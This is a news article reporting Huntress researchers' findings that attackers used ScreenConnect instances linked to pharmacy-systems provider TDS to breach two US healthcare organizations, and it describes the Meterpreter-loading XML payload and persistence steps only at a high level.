Security researchers have issued a warning about hackers targeting multiple healthcare organizations in the U.S. by exploiting the ScreenConnect remote access tool. They have identified the use of local ScreenConnect instances by Transaction Data Systems (TDS), a pharmacy supply chain and management systems solution provider operating in all 50 states.

The attacks were spotted by researchers at managed security platform Huntress, who observed them on endpoints from two different healthcare organizations. They also detected activity indicating network reconnaissance in preparation for further attacks.

“The threat actor proceeded to take several steps, including installing additional remote access tools such as ScreenConnect or AnyDesk instances, to ensure persistent access to the environments” – Huntress

The intrusions were observed between October 28 and November 8, 2023, and are believed to still be ongoing.

Attack details

Huntress reports that the attacks share similar tactics, techniques, and procedures (TTPs). These include the downloading of a payload named text.xml, indicating that the same actor is responsible for all observed incidents.

The .XML contains C# code that loads the Metasploit attack payload Meterpreter into the system memory, using non-PowerShell to avoid detection. Huntress also observed additional processes being launched using the Printer Spooler service.

The compromised endpoints run on a Windows Server 2019 system and are associated with two distinct organizations – one in the pharmaceutical sector and the other in healthcare. The common link between them is a ScreenConnect instance.

The remote access tool was used to install additional payloads, execute commands, transfer files, and install AnyDesk. The hackers also tried to create new user accounts for persistent access.

Researchers identified the ScreenConnect instance as being tied to the ‘rs.tdsclinical[.]com’ domain associated with TDS. It remains unclear if TDS suffered a breach, if credentials to one of their accounts were compromised, or if the attackers exploited a different mechanism.

Huntress made multiple attempts to notify TDS, now known as ‘Outcomes’ following a merger last summer, but the company did not respond.

, , , , ,
Show Comments

Fabio

Full Stack Developer

About the Author

I’m passionate about web development and design in all its forms, helping small businesses build and improve their online presence. I spend a lot of time learning new techniques and actively helping other people learn web development through a variety of help groups and writing tutorials for my blog about advancements in web design and development.

View Articles